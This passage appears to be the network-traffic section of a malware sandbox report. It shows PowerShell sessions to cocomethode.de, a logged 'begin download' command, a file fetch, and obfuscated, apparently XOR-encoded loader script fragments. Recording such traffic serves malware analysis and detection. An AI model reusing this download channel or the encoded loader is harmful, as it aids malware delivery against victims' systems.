2024-12-11 11:29:03 UTC	1230	IN	Data Raw: 25 6f 69 77 7b 69 6e 72 6c 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 60 6c 69 73 56 6d 53 5b 4c 6a 34 70 60 32 65 4f 53 44 47 32 55 31 53 57 4c 54 30 59 53 55 47 5b 57 46 4c 76 55 31 53 6f 4c 44 38 44 50 55 4f 5b 64 6a 6d 34 55 57 65 5b 4c 6a 34 37 5b 46 75 60 53 44 57 35 55 30 65 52 63 44 38 44 60 32 6d 4e 57 44 6a 7b 55 54 65 47 4c 54 30 54 57 55 57 5b 60 6d 4b 73 55 6d 53 73 4c 54 34 44 58 32 6d 4f 4c 6a 6d 37 56 6a 53 6f 4c 6d 71 59 56 55 4b 4e 4c 6d 4b 72 55 57 53 56 60 30 6d 37 50 6c 75 51 57 31 6a 79 52 56 71 7b 55 6a 4f 71 54 6c 71 68 4c 30 5b 30 5b 44 4f 43 4e Data Ascii: %oiw{inrl<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#`lisVmS[Lj4p`2eOSDG2U1SWLT0YSUG[WFLvU1SoLD8DPUO[djm4UWe[Lj47[Fu`SDW5U0eRcD8D`2mNWDj{UTeGLT0TWUW[`mKsUmSsLT4DX2mOLjm7VjSoLmqYVUKNLmKrUWSV`0m7PluQW1jyRVq{UjOqTlqhL0[0[DOCN
2024-12-11 11:29:03 UTC	1369	IN	Data Raw: 5b 33 5b 45 50 6a 53 68 4c 6b 54 78 56 6d 69 4a 4c 47 5b 49 4e 49 53 55 63 6a 34 33 58 6c 71 7b 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 53 56 79 30 5b 46 31 34 62 6d 71 55 4c 57 69 60 57 31 71 55 56 6d 69 46 4c 57 71 58 55 6b 43 4b 50 7b 47 56 58 33 30 73 5b 31 71 48 57 6f 6d 69 54 31 47 31 57 47 65 56 4c 46 47 49 4e 56 75 4b 53 6a 4b 33 58 7b 4f 53 5b 31 79 57 60 46 79 5b 57 30 4b 72 58 33 34 4f 5b 31 71 49 60 46 79 5b 57 30 4b 72 58 33 34 4f 5b 31 79 57 52 6f 5b 60 52 46 75 6f 52 6a 65 4a 65 6d 71 48 60 31 34 45 60 54 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 6c 54 55 43 4d 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 4b 70 56 57 69 52 60 6c 47 48 62 31 34 45 60 54 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 44 Data Ascii: [3[EPjShLkTxVmiJLG[INISUcj43Xlq{UjOqPVeKP1GoRTOC[1mEPVeKSVy0[F14bmqULWi`W1qUVmiFLWqXUkCKP{GVX30s[1qHWomiT1G1WGeVLFGINVuKSjK3X{OS[1yW`Fy[W0KrX34O[1qI`Fy[W0KrX34O[1yWRo[`RFuoRjeJemqH`14E`TGoRTOC[1mEPVelTUCMRTOC[1mEPVeKP1KpVWiR`lGHb14E`TGoRTOC[1mEPVeKP1GoRTD
2024-12-11 11:29:03 UTC	261	IN	Data Raw: 60 31 34 54 5b 46 30 4e 64 6d 6a 78 55 31 53 5b 4c 30 71 54 53 55 4f 4f 57 44 71 70 55 57 53 47 64 44 30 59 56 55 57 4f 4c 6d 44 76 55 57 53 4b 65 31 35 78 57 55 57 5b 57 47 6a 78 56 56 71 52 60 6a 34 37 63 46 69 4f 63 54 57 34 55 56 30 47 4f 47 71 70 55 6c 30 51 57 46 4c 7b 55 6d 53 57 4c 47 6d 70 55 55 53 5b 64 6a 71 70 55 57 53 4a 60 54 38 49 54 55 4b 60 53 44 4b 75 55 31 53 6b 4c 47 71 44 57 6c 75 4f 23 28 28 3a 0b 48 6f 77 6e 6a 64 2c 44 79 71 73 64 72 72 68 6e 6f 21 29 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 29 25 74 68 71 66 75 73 21 2a 21 25 6f 69 77 7b 69 6e 72 6c Data Ascii: `14T[F0NdmjxU1S[L0qTSUOOWDqpUWSGdD0YVUWOLmDvUWSKe15xWUW[WGjxVVqR`j47cFiOcTW4UV0GOGqpUl0QWFL{UmSWLGmpUUS[djqpUWSJ`T8ITUK`SDKuU1SkLGqDWluO#((:Hownjd,Dyqsdrrhno!)ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof))%thqfus!*!%oiw{inrl

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.11.20	49741	104.21.1.51	443	1804	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-11 11:29:03 UTC	285	OUT	POST /609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba96371e053b9048f0e3e116858dfb6bb0 HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: cocomethode.de Content-Length: 303
2024-12-11 11:29:03 UTC	303	OUT	Data Raw: 5b 0d 0a 20 20 20 20 22 5c 22 62 65 67 69 6e 20 64 6f 77 6e 6c 6f 61 64 20 68 74 74 70 73 3a 2f 2f 63 6f 63 6f 6d 65 74 68 6f 64 65 2e 64 65 2f 66 69 6c 65 32 2f 64 35 31 63 33 64 63 62 38 35 33 64 36 63 34 39 37 31 39 36 34 38 30 62 30 33 64 62 63 36 34 30 32 34 38 66 63 65 66 34 34 64 66 36 36 62 35 61 31 36 32 65 32 64 34 36 64 65 36 38 63 61 31 33 64 35 37 66 37 36 36 38 36 37 65 31 37 31 32 63 31 31 31 31 66 39 33 64 34 31 32 30 37 65 39 61 36 36 62 34 63 37 39 61 32 61 32 32 61 38 66 33 66 39 37 37 35 35 34 62 33 38 63 32 63 31 32 62 38 64 36 64 30 66 38 37 34 64 35 64 32 38 64 65 36 36 36 39 30 30 30 30 38 35 35 31 61 35 61 37 34 38 38 34 38 30 37 63 32 32 31 66 36 37 37 64 64 31 31 39 64 65 38 39 32 35 32 37 30 61 35 31 35 39 62 34 64 35 39 35 34 Data Ascii: [ "\"begin download https://cocomethode.de/file2/d51c3dcb853d6c497196480b03dbc640248fcef44df66b5a162e2d46de68ca13d57f766867e1712c1111f93d41207e9a66b4c79a2a22a8f3f977554b38c2c12b8d6d0f874d5d28de666900008551a5a74884807c221f677dd119de8925270a5159b4d5954
2024-12-11 11:29:04 UTC	1178	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:29:04 GMT Content-Length: 0 Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KxgqA26jPXc%2FbEwarBbDjb%2FX0d%2F%2FBTapWqDHgoGL7lIbM6imLhi4HPdsVOd1ooiMVML4rQd5iggB%2FRjadZQOWB%2F14tdU96g6FBYssbTunjtdhGxuKyU2wTs5lWM1yHXjqKFL9v8IBNQw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=18836&min_rtt=1366&rtt_var=24866&sent=6600&recv=2851&lost=0&retrans=0&sent_bytes=9471642&recv_bytes=23613&delivery_rate=37871447&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f0522801bed53b1-ATL server-timing: cfL4;desc="?proto=TCP&rtt=46&min_rtt=46&rtt_var=23&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=850&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=43&min_rtt=43&rtt_var=21&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=843&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
2024-12-11 11:29:04 UTC	220	IN	Data Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 31 34 32 35 30 26 6d 69 6e 5f 72 74 74 3d 31 31 34 31 34 33 26 72 74 74 5f 76 61 72 3d 32 34 32 34 31 26 73 65 6e 74 3d 36 26 72 65 63 76 3d 38 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 33 34 26 72 65 63 76 5f 62 79 74 65 73 3d 31 32 34 38 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 33 33 34 35 38 26 63 77 6e 64 3d 32 35 32 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 34 30 63 35 31 65 31 39 63 33 32 63 63 38 31 66 26 74 73 3d 38 35 31 26 78 3d 30 22 0d 0a 0d 0a Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=114250&min_rtt=114143&rtt_var=24241&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1248&delivery_rate=33458&cwnd=252&unsent_bytes=0&cid=40c51e19c32cc81f&ts=851&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.11.20	49742	104.21.1.51	443	1804	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-11 11:29:04 UTC	365	OUT	GET /file2/d51c3dcb853d6c497196480b03dbc640248fcef44df66b5a162e2d46de68ca13d57f766867e1712c1111f93d41207e9a66b4c79a2a22a8f3f977554b38c2c12b8d6d0f874d5d28de666900008551a5a74884807c221f677dd119de8925270a5159b4d5954723b3d86ef67de15dc0d9b5 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: cocomethode.de
2024-12-11 11:29:05 UTC	1288	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:29:05 GMT Content-Type: application/octet-stream Content-Length: 21736 Connection: close content-disposition: attachment; filename=image; filename*=UTF-8''image CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iX9DSbN9mx47t0EjR8P2GAZHlvMAhxl%2FYbffteSsbkGA6skTpXevRysRDlB2Acd6X9ATr%2BCK191zR3QcqiQ3O8uOb0aSc4WzS%2FAiee34JiSuI6Lef3S48iFUGGCLGM7eD0v8vgMfOXL4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=9497&min_rtt=1490&rtt_var=14863&sent=6046&recv=2856&lost=0&retrans=0&sent_bytes=8615650&recv_bytes=32086&delivery_rate=23968593&cwnd=280&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f052286eeea53c1-ATL server-timing: cfL4;desc="?proto=TCP&rtt=55&min_rtt=55&rtt_var=27&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=640&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=44&min_rtt=44&rtt_var=22&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=625&delivery_rate=0&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
2024-12-11 11:29:05 UTC	417	IN	Data Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 34 36 26 6d 69 6e 5f 72 74 74 3d 34 36 26 72 74 74 5f 76 61 72 3d 32 33 26 73 65 6e 74 3d 31 26 72 65 63 76 3d 33 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 72 65 63 76 5f 62 79 74 65 73 3d 36 32 30 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 30 26 63 77 6e 64 3d 32 30 34 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 26 74 73 3d 30 26 78 3d 30 22 0d 0a 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 31 33 37 39 37 26 6d 69 6e 5f 72 74 74 3d 31 31 Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=46&min_rtt=46&rtt_var=23&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=620&delivery_rate=0&cwnd=204&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"server-timing: cfL4;desc="?proto=TCP&rtt=113797&min_rtt=11
2024-12-11 11:29:05 UTC	1033	IN	Data Raw: 25 6f 62 6d 77 6c 65 71 76 6a 78 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 4e 55 43 58 53 6a 34 72 56 55 4f 56 64 56 47 58 54 6b 57 53 4c 6d 5b 30 5b 44 65 56 64 54 30 71 52 56 65 4c 57 6a 58 79 56 6d 69 4a 4f 54 6d 45 52 6d 53 52 57 59 69 46 54 55 47 53 5b 31 75 71 50 6a 65 57 60 7b 6d 4e 52 54 57 46 65 56 53 49 63 45 4b 69 56 44 6e 79 58 7b 47 42 64 56 48 78 54 6b 47 5b 4c 30 47 71 53 47 47 77 5b 31 6d 45 50 56 65 57 57 56 79 50 57 46 72 30 58 57 4f 56 63 44 71 54 64 54 47 71 54 57 5b 5b 5b 31 71 45 5b 33 75 5b 57 7b 54 76 58 57 69 60 62 46 4f 74 57 6b 43 4c 63 57 4b Data Ascii: %obmwleqvjx<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#NUCXSj4rVUOVdVGXTkWSLm[0[DeVdT0qRVeLWjXyVmiJOTmERmSRWYiFTUGS[1uqPjeW`{mNRTWFeVSIcEKiVDnyX{GBdVHxTkG[L0GqSGGw[1mEPVeWWVyPWFr0XWOVcDqTdTGqTW[[[1qE[3u[W{TvXWi`bFOtWkCLcWK
2024-12-11 11:29:05 UTC	1369	IN	Data Raw: 56 65 4b 63 54 34 31 56 6a 4c 30 63 46 57 49 57 56 6d 4b 50 7b 47 59 56 6d 69 4a 60 54 6d 48 52 6b 47 68 63 54 5b 37 52 54 4c 79 56 46 47 59 4f 56 75 68 4c 33 53 54 5b 44 69 72 62 30 71 55 50 6c 38 69 57 30 4b 73 56 6d 62 31 5b 31 79 57 53 6f 6d 60 4c 30 5b 31 56 6d 62 30 4c 47 53 49 63 49 71 6a 50 31 47 77 52 56 6a 34 60 6a 6d 48 55 6b 43 5b 56 44 6e 76 52 54 4c 34 65 46 47 59 4f 46 65 4b 60 54 6d 71 52 56 6d 42 65 33 48 7b 5b 46 79 6b 63 6a 34 77 56 6d 65 35 62 31 79 75 57 6b 53 60 54 31 47 31 57 6b 4b 72 65 57 71 49 4e 55 4f 57 4c 30 48 30 58 6a 65 57 5b 33 47 49 63 46 75 60 53 30 5b 30 52 54 4f 43 65 47 53 75 4e 54 30 68 4c 6c 53 33 52 54 4c 79 55 33 48 79 50 6f 6d 68 4c 6d 71 76 58 6a 65 57 5b 31 79 57 57 6b 53 60 57 31 35 79 5b 44 65 72 65 6c 4b 72 Data Ascii: VeKcT41VjL0cFWIWVmKP{GYVmiJ`TmHRkGhcT[7RTLyVFGYOVuhL3ST[Dirb0qUPl8iW0KsVmb1[1yWSom`L0[1Vmb0LGSIcIqjP1GwRVj4`jmHUkC[VDnvRTL4eFGYOFeK`TmqRVmBe3H{[Fykcj4wVme5b1yuWkS`T1G1WkKreWqINUOWL0H0XjeW[3GIcFu`S0[0RTOCeGSuNT0hLlS3RTLyU3HyPomhLmqvXjeW[1yWWkS`W15y[DerelKr
2024-12-11 11:29:05 UTC	1369	IN	Data Raw: 57 52 63 6d 47 57 4c 57 4b 53 56 46 69 42 54 6b 40 79 50 6d 50 76 53 6a 4f 68 53 54 5b 47 54 57 57 46 58 57 47 57 53 59 65 53 57 56 53 46 54 57 5b 72 54 6d 47 54 55 6a 4b 52 4c 57 5b 42 57 33 79 46 50 6a 34 57 53 6a 57 54 57 54 5b 50 57 57 57 4a 62 6d 47 57 54 6c 71 53 57 55 57 42 54 57 53 46 50 6d 4b 47 63 44 4b 54 57 54 5b 42 5b 54 57 46 52 47 5b 57 53 6c 47 57 57 54 71 78 54 57 57 52 63 6d 47 57 4c 54 4b 53 57 44 71 42 54 6b 47 56 50 6d 65 72 53 6a 4b 4e 57 54 5b 47 56 55 43 46 54 47 57 57 52 6f 53 53 57 56 53 46 54 57 57 72 63 6d 47 54 5b 44 4b 53 57 44 4b 42 54 55 4b 6a 50 6c 44 76 53 6a 69 54 57 54 5b 71 5b 45 43 4b 64 47 47 57 58 7b 43 53 57 30 4b 42 54 57 65 6a 50 6d 4b 44 50 6a 4b 55 57 54 5b 42 5b 54 57 46 53 57 47 57 53 6a 34 53 57 54 54 7b 54 Data Ascii: WRcmGWLWKSVFiBTk@yPmPvSjOhST[GTWWFXWGWSYeSWVSFTW[rTmGTUjKRLW[BW3yFPj4WSjWTWT[PWWWJbmGWTlqSWUWBTWSFPmKGcDKTWT[B[TWFRG[WSlGWWTqxTWWRcmGWLTKSWDqBTkGVPmerSjKNWT[GVUCFTGWWRoSSWVSFTWWrcmGT[DKSWDKBTUKjPlDvSjiTWT[q[ECKdGGWX{CSW0KBTWejPmKDPjKUWT[B[TWFSWGWSj4SWTT{T
2024-12-11 11:29:05 UTC	1137	IN	Data Raw: 53 57 56 79 74 54 57 53 6a 50 6d 47 54 50 6a 4b 53 4c 6c 53 42 57 46 75 46 50 6c 48 76 53 6a 71 53 57 54 5b 74 54 57 57 4e 50 6d 47 57 63 44 4b 53 57 32 53 42 54 6b 4b 6a 50 6d 65 72 53 6a 4f 69 53 54 5b 48 57 57 57 46 58 57 57 57 52 6b 57 53 57 56 69 4e 54 57 57 72 50 6d 47 54 63 44 4b 53 4c 44 5b 42 57 57 57 46 50 31 35 76 53 6a 6d 4f 53 54 5b 50 5b 45 43 46 55 30 47 57 53 6f 5b 53 57 56 79 42 54 57 65 6a 50 6d 44 76 53 6a 4b 55 57 54 5b 42 58 55 43 46 52 46 4c 76 53 6c 47 57 57 54 6a 79 54 57 57 4e 50 6d 47 56 50 6d 4b 53 57 33 53 42 54 55 43 72 50 6d 57 58 5b 44 4f 6a 60 31 5b 48 55 6a 57 46 60 30 47 57 52 6f 4f 53 57 56 4c 76 54 57 65 52 50 6d 47 58 54 6a 4b 52 63 44 5b 42 56 6d 5b 46 50 33 50 76 53 6a 69 56 57 54 5b 4a 56 6b 43 47 4c 30 47 57 53 59 Data Ascii: SWVytTWSjPmGTPjKSLlSBWFuFPlHvSjqSWT[tTWWNPmGWcDKSW2SBTkKjPmerSjOiST[HWWWFXWWWRkWSWViNTWWrPmGTcDKSLD[BWWWFP15vSjmOST[P[ECFU0GWSo[SWVyBTWejPmDvSjKUWT[BXUCFRFLvSlGWWTjyTWWNPmGVPmKSW3SBTUCrPmWX[DOj`1[HUjWF`0GWRoOSWVLvTWeRPmGXTjKRcD[BVm[FP3PvSjiVWT[JVkCGL0GWSY
2024-12-11 11:29:06 UTC	1369	IN	Data Raw: 57 54 5b 73 57 57 57 4a 62 30 47 57 60 44 34 53 57 30 4b 42 54 57 65 6a 50 6d 47 37 50 6a 4b 56 63 44 5b 45 5b 57 57 46 52 46 44 76 53 6a 71 53 57 54 5b 78 54 57 57 6e 57 6d 47 59 55 6c 34 53 63 6a 4b 42 54 55 43 46 50 6d 53 46 53 6a 4f 54 60 31 5b 48 57 6d 57 46 60 30 47 57 52 6f 5b 53 57 56 4c 31 54 57 5b 76 50 6d 47 59 5b 44 4b 52 60 31 5b 42 56 56 34 6a 50 33 57 73 53 6a 6d 57 57 54 5b 4a 54 57 57 46 4c 47 47 57 57 6c 34 53 57 6f 43 52 54 56 30 6e 50 6d 48 79 53 6a 4b 59 63 44 5b 45 5b 57 57 46 52 57 53 57 53 6a 71 53 57 54 5b 78 54 57 57 6a 63 6d 47 56 62 47 4b 53 63 56 69 42 54 6b 47 46 50 6d 65 72 53 6a 4f 6d 57 54 5b 4b 57 47 57 46 52 6d 47 57 53 6b 43 53 57 57 5b 4a 54 57 65 4a 4c 30 47 75 65 44 4b 55 53 32 53 42 54 30 57 46 50 6c 44 76 53 6a 69 Data Ascii: WT[sWWWJb0GW`D4SW0KBTWejPmG7PjKVcD[E[WWFRFDvSjqSWT[xTWWnWmGYUl4ScjKBTUCFPmSFSjOT`1[HWmWF`0GWRo[SWVL1TW[vPmGY[DKR`1[BVV4jP3WsSjmWWT[JTWWFLGGWWl4SWoCRTV0nPmHySjKYcD[E[WWFRWSWSjqSWT[xTWWjcmGVbGKScViBTkGFPmerSjOmWT[KWGWFRmGWSkCSWW[JTWeJL0GueDKUS2SBT0WFPlDvSji
2024-12-11 11:29:06 UTC	1369	IN	Data Raw: 57 6e 76 52 59 65 53 57 57 4b 37 54 57 57 52 54 6d 47 57 65 44 4b 53 4c 44 5b 42 54 30 57 46 50 6d 6e 76 53 6a 53 53 57 54 5b 4a 54 57 57 46 63 6d 47 57 55 6a 4b 53 57 56 79 42 54 56 31 79 50 6d 4b 37 60 44 4b 5b 4c 6c 53 42 56 6b 43 46 53 47 6e 76 53 6a 75 53 57 54 71 32 54 57 57 4e 50 6d 47 56 50 6d 4b 53 57 33 53 42 54 6a 57 46 50 6d 50 7b 5b 44 4b 60 4c 44 5b 44 57 57 57 46 60 47 57 57 53 6c 34 53 57 54 30 32 54 57 65 4a 50 6d 47 70 50 6a 4b 53 4c 44 5b 42 54 33 75 46 50 33 47 57 53 6a 6d 69 4c 44 5b 73 54 57 57 4a 62 30 47 57 57 6a 5b 53 57 31 34 74 54 56 34 72 50 6d 48 76 57 6a 4b 60 57 6a 5b 42 5b 47 57 46 53 6c 50 76 53 6c 47 57 57 54 6e 79 54 57 57 6a 60 6d 47 59 54 6a 4b 53 63 55 6d 42 54 6a 69 4e 50 6d 4f 57 53 6a 4b 69 4c 44 5b 48 58 55 43 46 Data Ascii: WnvRYeSWWK7TWWRTmGWeDKSLD[BT0WFPmnvSjSSWT[JTWWFcmGWUjKSWVyBTV1yPmK7`DK[LlSBVkCFSGnvSjuSWTq2TWWNPmGVPmKSW3SBTjWFPmP{[DK`LD[DWWWF`GWWSl4SWT02TWeJPmGpPjKSLD[BT3uFP3GWSjmiLD[sTWWJb0GWWj[SW14tTV4rPmHvWjK`Wj[B[GWFSlPvSlGWWTnyTWWj`mGYTjKScUmBTjiNPmOWSjKiLD[HXUCF
2024-12-11 11:29:06 UTC	1369	IN	Data Raw: 43 4d 52 54 4f 43 5b 31 6d 49 57 6f 4f 6b 4c 6d 57 4e 50 33 6d 43 5b 31 6d 45 50 6b 65 44 54 56 38 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 53 6a 5b 4a 57 45 40 30 55 30 65 73 63 47 71 55 57 55 69 6f 52 56 30 4a 4f 56 4f 49 53 6f 71 6b 64 54 48 79 56 57 65 4f 5b 33 4f 74 57 6f 57 4b 53 31 34 31 56 6a 4f 4b 4f 31 53 53 63 33 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 46 55 6b 43 5b 56 44 6e 76 55 47 69 42 64 56 48 78 55 6c 79 6b 4c 31 30 6f 52 56 34 42 65 6c 50 78 57 6f 6d 6b 4c 6c 69 72 58 6a 65 32 65 57 71 58 60 46 79 4b 60 54 47 6f 55 47 57 46 64 57 6e 7b 57 6f 53 60 57 7b 54 76 57 44 65 72 64 6c 53 45 50 56 38 4b 60 55 47 46 58 6c 30 4e 65 6d 71 49 57 6c 75 53 4c 6b 6d 31 58 6d 65 46 65 57 71 45 50 6d 5b 6a 4c 44 6d 32 54 57 57 6a 53 6d 47 59 55 6c 34 53 60 Data Ascii: CMRTOC[1mIWoOkLmWNP3mC[1mEPkeDTV8oRTOC[1mEPVeKSj[JWE@0U0escGqUWUioRV0JOVOISoqkdTHyVWeO[3OtWoWKS141VjOKO1SSc3eKP1GoRTOC[1mFUkC[VDnvUGiBdVHxUlykL10oRV4BelPxWomkLlirXje2eWqX`FyK`TGoUGWFdWn{WoS`W{TvWDerdlSEPV8K`UGFXl0NemqIWluSLkm1XmeFeWqEPm[jLDm2TWWjSmGYUl4S`
2024-12-11 11:29:06 UTC	1369	IN	Data Raw: 55 52 55 65 44 54 56 38 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 60 30 71 49 4e 55 4f 68 63 59 69 33 56 57 65 52 54 30 71 58 55 6b 47 68 52 47 47 6f 54 47 4f 42 53 56 48 7b 5b 49 57 68 53 7b 6d 6e 56 6a 4c 79 53 33 47 59 64 46 79 52 63 6a 71 33 58 6d 5b 56 64 56 4b 45 50 59 53 56 56 44 71 7b 52 54 4f 4a 63 33 53 48 54 6f 65 6b 64 6c 38 33 55 45 4b 4e 65 6d 6a 78 4e 59 53 60 56 47 4b 77 58 6b 4b 52 63 44 79 75 54 6c 79 4c 4c 6d 71 76 58 6a 65 57 64 54 79 37 5b 46 30 60 53 44 5b 6e 55 31 53 72 60 31 30 44 50 59 6d 4f 53 30 4b 70 56 6c 30 60 63 44 30 37 5b 46 71 4f 64 6a 31 76 55 54 53 73 64 57 71 44 52 55 57 4e 57 46 72 7b 55 6a 53 73 4f 57 6d 59 56 55 53 5b 60 6c 65 34 56 57 53 52 63 54 30 37 5b 46 30 5b 60 6c 4c 79 56 6c 71 6a 63 54 Data Ascii: URUeDTV8oRTOC[1mEPVeKP1GoRTOC`0qINUOhcYi3VWeRT0qXUkGhRGGoTGOBSVH{[IWhS{mnVjLyS3GYdFyRcjq3Xm[VdVKEPYSVVDq{RTOJc3SHToekdl83UEKNemjxNYS`VGKwXkKRcDyuTlyLLmqvXjeWdTy7[F0`SD[nU1Sr`10DPYmOS0KpVl0`cD07[FqOdj1vUTSsdWqDRUWNWFr{UjSsOWmYVUS[`le4VWSRcT07[F0[`lLyVlqjcT
2024-12-11 11:29:06 UTC	1369	IN	Data Raw: 58 33 34 53 5b 33 4f 48 52 6f 5b 5b 4c 6d 5b 37 58 32 6d 32 5b 33 50 78 53 6f 43 6a 50 31 4b 37 5b 44 62 34 65 31 6d 70 62 31 34 45 60 54 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 6d 53 6a 53 31 5b 34 5b 44 4c 79 54 56 4f 75 4e 56 71 60 56 44 34 37 52 54 4f 52 60 6c 4b 59 54 6a 38 5b 57 7b 47 72 52 54 4c 79 50 6c 4f 75 5b 45 47 68 57 30 5b 30 5b 44 57 35 62 46 4c 7b 54 56 65 4d 50 30 4b 70 58 6b 48 79 65 47 6d 59 4f 56 75 4d 54 31 47 31 57 6b 4b 72 65 57 71 49 4e 55 4f 57 4c 30 48 30 58 6a 65 57 5b 30 4f 49 63 46 75 60 53 30 5b 30 55 32 62 76 52 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 5b 4e 4c 47 6d 58 52 6b 43 4c 57 6a 34 7b 56 6d 65 56 65 31 6d 45 4c 57 53 60 57 31 34 Data Ascii: X34S[3OHRo[[Lm[7X2m2[3PxSoCjP1K7[Db4e1mpb14E`TGoRTOC[1mEPVeKP1GoRTOC[1mEPmSjS1[4[DLyTVOuNVq`VD47RTOR`lKYTj8[W{GrRTLyPlOu[EGhW0[0[DW5bFL{TVeMP0KpXkHyeGmYOVuMT1G1WkKreWqINUOWL0H0XjeW[0OIcFu`S0[0U2bvR1mEPVeKP1GoRTOC[1mEPVeKP1GoRT[NLGmXRkCLWj4{VmeVe1mELWS`W14

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.11.20	49743	104.21.1.51	443	1804	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
